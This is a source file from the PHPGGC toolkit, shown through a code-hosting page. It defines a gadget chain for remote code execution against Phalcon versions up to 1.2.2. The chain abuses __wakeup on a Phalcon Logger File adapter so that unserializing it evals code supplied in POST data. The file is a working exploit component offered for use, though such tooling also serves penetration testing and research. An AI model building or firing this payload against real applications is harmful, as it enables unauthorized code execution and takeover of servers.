Codebase list phpggc / f355e954-fb44-4c31-aeff-8343ab60b129/upstream gadgetchains / Phalcon / RCE / 1 / chain.php
f355e954-fb44-4c31-aeff-8343ab60b129/upstream

Tree @f355e954-fb44-4c31-aeff-8343ab60b129/upstream (Download .tar.gz)

chain.php @f355e954-fb44-4c31-aeff-8343ab60b129/upstreamraw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php

namespace GadgetChain\Phalcon;

class RCE1 extends \PHPGGC\GadgetChain\RCE
{
    public static $version = '<= 1.2.2';
    public static $vector = '__wakeup';
    public static $author = 'Raz0r';
    public static $information = '
        This chain does not expect parameters, will eval() any code supplied in 
        php://input (i.e. POST data). Requires allow_url_include = true.
    ';

    # No parameters expected
    public static $parameters = [];

    public function generate(array $parameters)
    {
        return new \Phalcon\Logger\Adapter\File();
    }

    public function test_setup()
    {
        throw new \PHPGGC\Exception("This GC cannot be tested.");
    }
}